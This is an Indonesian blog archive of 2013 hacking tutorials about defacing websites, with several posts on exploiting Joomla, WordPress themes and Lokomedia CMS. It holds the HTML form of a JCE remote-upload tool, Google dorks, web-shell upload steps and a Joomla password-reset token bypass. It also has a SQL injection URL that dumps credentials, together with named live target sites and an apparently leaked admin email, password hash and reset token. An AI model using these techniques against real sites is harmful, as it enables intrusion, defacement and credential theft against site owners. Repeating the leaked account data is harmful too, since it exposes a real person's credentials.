Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Tampilkan postingan dengan label Deface. Tampilkan semua postingan
0

Exploit JCE Joomla Extension | Exploit Joomla JCE

Kamis, 09 Mei 2013
Arsyad-Cyber
Asslamualaikum,  Maaf Sebelumnya saya jarang mempost, karna berhubung banyak nya tugas sekolah an yang harus saya selesaikan
Gk usah lama" , langsung Check This Out !!!!
Copas Dulu File JCEnya :
<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
<style type"text/css">
body {
 background:#e1e1e1;
 font-family: orbitron;
 padding:4;
 width:98%;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 6px 6px 6px 6px;
  -moz-border-radius: 6px 6px 6px 6px;
   border-radius: 6px 6px 6px 6px;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
}
#header {
 color:#00FF00;
 text-align:center;
 text-shadow:1px 2px 3px #0000FF;
 font-size:30px;
}
.tablenya{
}
.atas1 {
 width:30%;
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 6px 0 0 0;
  -moz-border-radius: 6px 0 0 0;
   border-radius: 6px 0 0 0;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
}
.atas2 {
 width:50%;
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 0 6px 0 0;
  -moz-border-radius: 0 6px 0 0;
   border-radius: 0 6px 0 0;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
 color:#FF0000;
}
.tengah1 {
 width:30%;
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 0 0 0 0;
  -moz-border-radius: 0 0 0 0;
   border-radius: 0 0 0 0;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
}
.tengah2 {
 width:50%;
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 0 0 0 0;
  -moz-border-radius: 0 0 0 0;
   border-radius: 0 0 0 0;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
 color:#FF0000;
}
.required {
 text-align:right;
 color:#FF0000;
 position:fixed;
 right:3%;
}
input {
 font-size:18px;
 font-weight:bold;
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 6px 6px 6px 6px;
  -moz-border-radius: 6px 6px 6px 6px;
   border-radius: 6px 6px 6px 6px;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
 color:#FF0000;
}
.start {
 text-align:center;
 color:#FF0000;
}
#footer {
 background-color: #e1e1e1;
 border: 1px solid #050505;
 -webkit-border-radius: 0 0 6px 6px;
  -moz-border-radius: 0 0 6px 6px;
   border-radius: 0 0 6px 6px;
 *zoom: 1;
 -webkit-box-shadow: inset 0 1px 0 #ffffff;
  -moz-box-shadow: inset 0 1px 0 #ffffff;
   box-shadow: inset 0 1px 0 #ffffff;
}
/*NoScript*/
#enjs {z-index: 999;position:fixed;top:0;left:0;width:100%;height:100%;background-color:#000;margin:0;padding:0;}
#enjs p {margin:0;padding:0;width:100%;color:#333;position:relative;top:40%;font:bold 18px/20px arial;text-align:center;text-shadow:none;}
/*ScrollBar */
::-webkit-scrollbar {width: 12px;}
::-webkit-scrollbar-track {background:rgb(71, 71, 71);}
::-webkit-scrollbar-thumb, ::-webkit-scrollbar-thumb:window-inactive { background: rgb(34, 34, 34); }

#loading-overlay {position:fixed;top:0;left:0;right:0;bottom:0;background:#000000;z-index:999999;text-align:center;width:100%;height:100%;padding-top:22%;color:#FF0000;}
.ball {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-right:5px solid transparent;border-left:5px solid transparent;border-radius:50px;box-shadow: 0 0 35px rgb(255 ,0 , 0);width:50px;height:50px;margin:0 auto;-moz-animation:spinPulse 1s infinite ease-in-out;-webkit-animation:spinPulse 1s infinite linear;}
.ball1 {background-color: transparent;border:5px solid rgb(240 ,0 , 0);border-left:5px solid transparent;border-right:5px solid transparent;border-radius:50px;box-shadow: 0 0 15px rgb(255 ,0 , 0);width:30px;height:30px;margin:0 auto;position:relative;top:-50px;-moz-animation:spinoffPulse 1s infinite linear;-webkit-animation:spinoffPulse 1s infinite linear;}
@-moz-keyframes spinPulse {0% { -moz-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)}50% { -moz-transform:rotate(145deg); opacity:1; }100% { -moz-transform:rotate(-320deg); opacity:0; }}
@-moz-keyframes spinoffPulse {0% { -moz-transform:rotate(0deg); } 100% { -moz-transform:rotate(360deg); }}
@-webkit-keyframes spinPulse {0% { -webkit-transform:rotate(160deg); opacity:0; box-shadow:0 0 1px rgb(255, 0, 0)} 50% { -webkit-transform:rotate(145deg); opacity:1;} 100% { -webkit-transform:rotate(-320deg); opacity:0; }}
@-webkit-keyframes spinoffPulse {0% { -webkit-transform:rotate(0deg); } 100% { -webkit-transform:rotate(360deg); }}
</style>
</head>
<body>
<div id="header">-=[ JCE Joomla Extension Remote File Upload ]=-</div><br>
<form name="form1" action="" enctype="multipart/form-data"  method="post">
<table class="tabelnya">
 <tr>
  <td class="atas1">hostname (ex:www.sitename.com):</td>
  <td class="atas2"><input name="host" size="90"> *</td>
 </tr>
 <tr>
          <td class="tengah1">path (ex: /joomla/ or just / ):</td>
    <td class="tengah2"><input name="path" size="90"> *</td>
 </tr>
 <tr>
          <td class="tengah1">Please specify a file to upload:</td>
    <td class="tengah2"><input type="file" name="datafile" size="88"> *</td>
 </tr>
 <tr>
          <td class="tengah1">specify a port (default is 80):</td>
    <td class="tengah2"><input name="port" size="90"></td>
 </tr>
 <tr>
          <td class="tengah1">Proxy (ip:port):</td>
    <td class="tengah2"><input name="proxy" size="90"></td>
 </tr>
</table>
<div id="footer">
          <div class="required">*fields are required</div>
    <br>
    <div class="start"><input type="submit" value="Start" name="Submit"></div>
    <br>
</div>
        </form>
  <div class="start">&copy 2013 ShadoWNamE</div>
<div id="loading-overlay">
<div class="ball"></div>
<div class="ball1"></div>
<h3>Loading..............</h3>
</div>
<script>
// hilangkan overlay dengan efek .fadeOut() jika keseluruhan halaman telah selesai dimuat
$(window).bind("load", function() {
    $("#loading-overlay").fadeOut();
});
</script>
</body></html> 

Dork : 
 inurl:index.php?option=com_jce
Oke, Langsung Aja Tutornya nya ^_^

1. Upload File Php nya Di Shell Agan / Localhost



2.  Masukan Dork Ke Google

3. Keluar tuh Banyak Website, Coba 1-1 yah :D , Tapi Saya Disini Sudah Punya Live Target
www.saintpatricktemuco.cl
 4. Masukan Url Site nya Ke  " hostname (ex:www.sitename.com): " ,
    Contoh : www.saintpatricktemuco.cl ( tanpa http:// dan / )
5. Di Path : path (ex: /joomla/ or just / ):
Contoh : www.site.com/joomla/ ( Untuk Path bisa gunakan /joomla/ atau kalau di website tidak mempunyai path bisa gunakan / saja )

6. Pilih Shell Yang Akan Kalian Upload 

7.Klik START !!!

8. Buka deh tuh shell nya

9. Cari file " index.html " ( tanpa tanda kutip ) , Klik E / Edit

10 Pasang Script Agan , Klik Save

11. Lalu Buka Link nya http://www.saintpatricktemuco.cl/images/stories/index.html


Sekian Tutor dari saya, maaf-maaf bila ada salah kata ... Jika kita terus berusaha, semua akan pasti bisa ^_^
Terima kasih , Wassalamualikum Wr. Wb.

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
1

Exploit Joomla 0day ( COM_EXPOSE )

Kamis, 11 April 2013
Arsyad-Cyber
 
 
#Author: Mauritania Attacker
#Dork: index.php?option=com_expose
#Exploit: administrator/components/com_expose/uploadimg.php 
#Shell: /components/com_expose/expose/img/shell.php 
#Date: 11/05/2012
# www.mauritania-sec.com
 
 Hargai karya orang lain dengan memasang sumber setelah mengcopy   
1

Deface Site SCH.ID

Arsyad-Cyber
Dork : inurl:/html/index.php +site:sch.id

Exploit : /member/index.php or /member/user.php

User : siswanto
Pass : 123456

Tahap Menanam Shell

SIM -> Data Laporan -> Tambah data laporan -> simpan -> sukses

Tempat shell berada :

site.sch.id/laporan/namashell.php

Thank's : Tintonz-x207 - 207 Cyber Security - Java Defacer Team

Sumber : Tintonz 
1

Deface CSRF ( Cross Site Request Forgery )

Rabu, 03 April 2013
Arsyad-Cyber

Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: idca
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :
  • inurl:/wp-content/themes/shepard
  • inurl:/wp-content/themes/money
  • inurl:/wp-content/themes/clockstone
  • inurl:/wp-content/themes/ambleside
  • inurl:/wp-content/themes/pacifico
#Dork dikembangkan sendiri ya :)

4. Untuk coba2 gunakan Live Target & Live Target 2

5. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)

#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)


2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)


Contoh :
http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"

Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p

4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!
Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"



5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .


Jika berhasil maka akan muncul seperti ini (lihat gambar)


6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini



#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)

Tampilan madspotshell::

7. Untuk eksekusi Index

Sumber : IDCA

Terima Kasih buat sobat gw dari IDCA Bimo dan ONix Aqua , saya hanya ikut men sharre tutorial yang diberikan dari Grop IDCA ^_^

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Deface Dengan Bypass Admin

Arsyad-Cyber
kali ini ane mau share tentang teknik Bypass Halaman Login Administrator! Bagaimana caranya? Yuk simak aja rame rame,, hehhehe ;)

Bahan Bahan :

Dork: inurl:/index_info.php     Lihat Dork yg lain Disini

Live Target : http://niche-marketplace.net/index_info.php  

Note: "Mohon Live Target Jangan Dirusak, karena untuk pembelajaran bersama, kalo udah bisa cari aja target yang lain!"

Langkah Langkahnya:

Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php


Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php 


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!



 Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :


 Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!


Lalu tekan Enter!


Klik Login aja!

Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p



Duaaarrrrrrrrr!! Udah masuk? Mantap! Trus mo ngapain lagi?? udah gitu aja! wkwkwkwk :p


Trus Tebas index nya gimana gan?? Hajiahhh,, :3 makanya baca tutorial ampe abis dulu, dipahami dan dipelajari baru dipraktekin.. hadeewwhhh!!

Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! Apa itu Shell?? Baca lagi sono di postingan ane Apa itu WebShell :p Disini ane make Madspotshell!

WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p

Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"



Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!


 Lalu klik "Add New Navigation"


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!



Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php".  Lihat gambar!


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!



Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.

< Line kosong>
< Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
< Line kosong>
< Line kosong>

Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :


 lalu


Lalu klik Save! akan muncul pesan seperti gambar berikut!


Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!



Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk

Sumber : IDCA

Hargai karya orang lain dengan memasang sumber setelah mengcopy
0

Tutorial Tamper Data

Arsyad-Cyber

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah kalo ntar pas agan mau upload extensi .jpg bagaimana ? yah, harus memakai Teknik Tamper Data ... Yaitu memanfaatkan celah upload image, sedangkan kita menipu admin dengan mengupload file yg extensi nya .php ^_^

Dork : inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"

NB : Anda bias menambahkan site: ^_^



1. Siapakan dulu file shell.php seperti : Shell B374K M1N1


2.  Pilih salah satu shell
3. Rename  extensinya menjadi : shell.php.jpg
4. Install add ons Tamper Data dulu di browser mozilla kita :D
5. Restart dan kita mulai upload 
6. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan

8. Trus Uploads shell.php.jpg kita dan tamper :D


 9. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan hapus bagian .jpg , akan menjadi shell.php .. abis gitu kita klik OK



Letak Shellnya :

http://site.com/wp-content/themes/ ? /images/tmp/[shellmu] -
http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit Joomla Token

Selasa, 02 April 2013
 Arsyad-Cyber
######################################################################################### Joomla 1.5.x Remote Admin Password Change ########################################################################################## ## # ### ######################################################################################


File : /components/com_user/controller.php

#####################################################################################Line : 379-399

function confirmreset(){// Check for request forgeriesJRequest::checkToken() or die( 'Invalid Token' );

// Get the input$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}

// Get the model$model = &$this->getModel('Reset');

// Verify the tokenif ($model->confirmReset($token) === false) < --- {2}{$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);return false;}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130


function confirmReset($token){global $mainframe;

$db = &JFactory::getDBO();$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}

// Verify the tokenif (!($id = $db->loadResult())){$this->setError(JText::_('INVALID_TOKEN'));return false;}

// Push the token and user id into the session$mainframe->setUserState($this->_namespace.'token', $token);$mainframe->setUserState($this->_namespace.'id', $id);

return true;}#####################################################################################


{1} - Replace ' with empty char{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 ANDactivation = '' "


Contoh :


1. Pergi Ke url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Tuliskan "token" char ' Dan klik OK.

3. Tulis password baru untuk admin

4. Pergi ke halaman admin CMS Joomla : target.com/administrator/

5. Login dengan password yang tadi agan masukan

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit WpStore

Arsyad-Cyber -
- = Newbie Was Here = -
Yang mastah silahkan lewat :D klo mau baca blh
Newbie merapat :D




dork : inurl:/wp-content/themes/
WPstore/
kita dapat meng-upload backdoor
dengan vulnerability ini:
1. WPStore
2. eShop
3. KidzStore
4. Emporium
5. Store
klo udah dpet target, kita tambah /
UPLOAD di target tersebut...
http://www.target.com/wp-
content/themes/Wpstore/upload
selanjutnya akan muncul file
upload,sekarang kita upload shell
kesayangan.... klo udah di upload,
tinggal eksekusi shell kita...
caranya :
http://www.target.com/wp-
content/uploads/products_img/
namashell.php
selesai dehhh..... sekrang terserah
mau di apain tuh sitenya... :D
Author : Arsyad Imam B.
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit Joomla

Arsyad-Cyber - Targetnya cari di googlePake Dork ini:

inurl:"option com_artforms"

kita dapat target yaitu :

http://www.avaclean.com/

di exploitnya kodenya di paste ke target tadi ya :D

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--


ntar jadi nya kyak gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

disitu udah kelihatan emailnya

josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P

nah open tab lagi ya kk mastah :)

teruscopy code reset pass ini

/index.php?option=com_user&view=reset

terus masukin kode reset paswordnya  menjadi seperti ini :

http://www.avaclean.com//index.php?option=com_user&view=reset

setelah itu disuruh masukin email nantinya

masukin email yg kita dapat tadiyaitu

josh@bkmediagroup.com

setelah di enteranda disuruh masukin code :

kita tinggalin dulu yg inikita cari kode tsb diweb yg kita exploid tadi

open tab lagi neh untuk ngambil token nya :)

masukan code ini :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

ntar jadi nya gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

code nya :

admineda7d6142fac40a533b56407a4617371

nah kita kembali ke halaman reset tadi

kita masukin aja token yang ini

eda7d6142fac40a533b56407a4617371

truss enter :)) eehhh minta password baru dech dia :D

uppzzzzz kita masukin aja dech password kita :))

setelah udah masukin

kita masuk ke halaman admin nya

contoh :

http://sitetarget.com/administrator

nah masukin user nya :) & password kita Selamat mencoba :)

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit Joomla Com_Fabrik

   Oh ya, disini saya jelaskan sedikit ya tentang exploit. Saya sih belum tau arti lengkapnya, tapi secara singkatnya itu exploit dapat diartikan sebagai sebuah kode yang menyerang keamanan

Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.

1. Copas dork ini ke google [dork bisa dikembangkan]


  • inurl:index.php?option=com_fabrik

2. Ceritanya kita sudah mendapat si target

  • http://ar.librodar.com.ar/index.php?option=com_fabrik

3. Maka pastekan Vulnerable path nya di depan Url, Vulnerable path nya adalah ini :

  • index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Maka akan jadi seperti ini

  • http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

5. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe

  • php,asp,html,jpg

6. Sudah ? nah sekarang kita akses shellnya di

  • http://localhost.com/media/shell.php

Kalo tipe .php gabisa ya terpaksa dengan tamper data :D 

Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan
Sumber : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Deface Dengan RootKit

pertama-tama download dulu programnya di sini
Enaknya Program ini tidak perlu di install hanya tinggal di jalankan saja..

Nah disini saya akan mencoba deface situs http://redevprops.com/index.html yang tampilan


Okeh langsung kita jalankan saja programnya :


1. klik file "Is-rootkit.exe"..






2. klik "WebDav" ==> "asp shell maker"..



3. klik “Setting”.
*Lalu hapus “name of your shell”, ganti shell dengan sesuka anda..
Kalo tidak ganti dengan index.html saja..

*Hapus juga semua “write your shell here”, lalu masukan file yg berformat “.html” anda dengan mengklik “Load file”..

NB : Jika Tidak Punya Script Deface Bisa Menggunakan Script Saya Tinggal Anda Eddit" Aja DI Notepad :DD!!
Download Aja ==> DISINI <==

4. langkah selanjutnya adalah klik “Add site” lalu masukan alamat situs target..



5. dan yang terakhir tinggal klik “serang !!!” deh..
Tunggu beberapa saat, jika web tersebut vulnaribel maka akan keluar sperti ini..




Lalu copy shell yang sudah ter buat tadi..



Lalu kita lihat hasilnya, pastekan shell yang tadi kita copy di tempat kita masukan alamat..
Maka hasilnya sperti ini :


Halaman asli dari situs tersebut telah kita deface..hehehe
Sumber : Disini 
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Bug CMS Lokomedia After Patch

Bugs Template CMS Lokomedia After Patch

Arsyad-Cyber - Permasalahan yang dihadapi sekarang adalah jika admin sebuah website yang kita deface mengetahui celah websitenya dan melakukan sebuah tindakan yang dinamakan Patch. Jika hal tersebut terjadi hal seperti Deface Lokomedia sudah tidak berfungsi lagi, tapi jangan khawatir karena saya mempunyai bugs lain dalam deface Lokomedia.

Dork : allinurl:media.php?module=berita
Pilih suatu web yang menurut anda bisa di deface dengan lokomedia , ingat !!! tutorial selanjutnya itu sama dengan artikel Deface Dengan Lokomedia tetapi masalahnya ketika anda pasang banner tempat upload nya tidak ada karena sudah di patch.

http://www.target.com/admin/content.php?module=banner
Langsung ganti url web target nya menjadi sperti berikut :

http://www.target.com/admin/modul/mod_banner.php
Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :

./aksi.php?module=banner&act=input
Kemudian ganti dengan

http://www.target.com/admin/aksi.php?module=banner&act=input
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :

http://www.target.com/admin/foto_berita/shell.php
Setelah itu terserah kreasi anda sendiri yang mempunyai backdoor menjadi hak utuh milik anda , kami hanya share ilmu yang kami tahu dan tidak untuk membahayakan dan merugikan pihak lain bahkan resiko anda sendiri yang menanggungnya. Dan Untuk admin website Lokomedia saya harapkan untuk menutup bugs tersebut agar website anda aman dari serangan defacer yang banyak di dunia maya ini. Semoga Bermanfaat untuk anda semua.

Happy To Hacker And Defacer , Its All About Your'e Brian !!!

Sumber : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit CMS Balitbang

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.
0

Cara Mencari Config Bekas

Arsyad-Cyber - Mencari Config Bekas
 Asslamualikum kawan ^_^, Kali ini saya bakal memberi kalian tutor Mencari Config Bekas "
Mungkin bagi yang newbie seperti saya cocok nih, bagi yang bisa memasang config diwebsite, nihh langsung ane kasih tau Cara Mencari Config Bekas ^_^
berburu config gih disini yah :dork : Wordpress.txt intitle:Index Of
ga usah pake demo yah :)tinggal kalian cari aja disitu sql.php, Mysql.php or database.php buat login nya..
yah kalo ga ada cari target lain :D haha

oh iyah, Wordpress.txt
bisa di ganti juga joomla.txt or whmcs.txt

selamat mencoba ^_^
maaf masih newbie dera mah :)
cun dulu dong.. :vwkwkwkwkwkw
NB : Kalian bisa menambahkan intext: / site:

Sekian Dari saya kawan , wassalamualikum wr.wb ^_^
Author : Dera Kyubi ThecyberBoys  
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Tutorial Deface Dengan Reserve IP

Senin, 01 April 2013
Arsyad-Cyber - Metode Men-Hack Website dengan Reverse Ip.

Cara Hack Target Dengan Metode Reverse Ip membutuhkan sedikit waktu.
Pertama anda perlu target, misalkan http://herchcovitch.uol.com.br/. Maka untuk men-reverse Ip anda sekarang perlu ping target Anda seperti ini >> Buka CMD => http://herchcovitch.uol.com.br/


Versi 1. : Menggunakan CMD 

1.Pertama Anda Harus Mencari Suatu Website Di Google.co.id atau bing.com Liat contohnnya

2. Setelah kita dapat target  POC: http://herchcovitch.uol.com.br langsung kita Ping mengunakan CMD
 Quote:Pinging http://herchcovitch.uol.com.br/ [200.147.0.120] with 32 bytes of data:
dan ambil IP nya 200.147.0.120

3. Kemudian buka bing.com paste kode di bawah ini: Dan tulis dorknnya ip:200.147.0.120 php?id=




Versi 2  : Menggunakan http://www.yougetsignal.com/tools/web-sites-on-web-server/ 

1 .atau ambil IP nya paste ke link di bawah untuk melihat web yg satu server:




2.  Hasilnnya adalah 200.147.0.120 IP Dari Website http://herchcovitch.uol.com.br/

3. Setelah Itu Kita Buka DISINI Dan Search Menggunakan Dork ip:200.147.0.120 php?id=

 4. Disini Saya Memilih Website http://casadachris.uol.com.br/faca_materia.php?id=36  Sebagai Contoh

5. Selesai ^_^ Setelah Kita Dapat Websitennya Kita Inject Menggunakan SQLI,SQLMAP,Havj,Bactrack5 DLL


disana nanti akan terlihat website yang banyak dalam satu host/server dengan IP/WEbsite di atas.
Sekarang periksa semua situs satu per satu untuk menginjeksi sql injection.
Jika Anda mendapat rentan terhadap sql injection di website tsb, langsung saja mengupload shell, dan lakukan symlink senang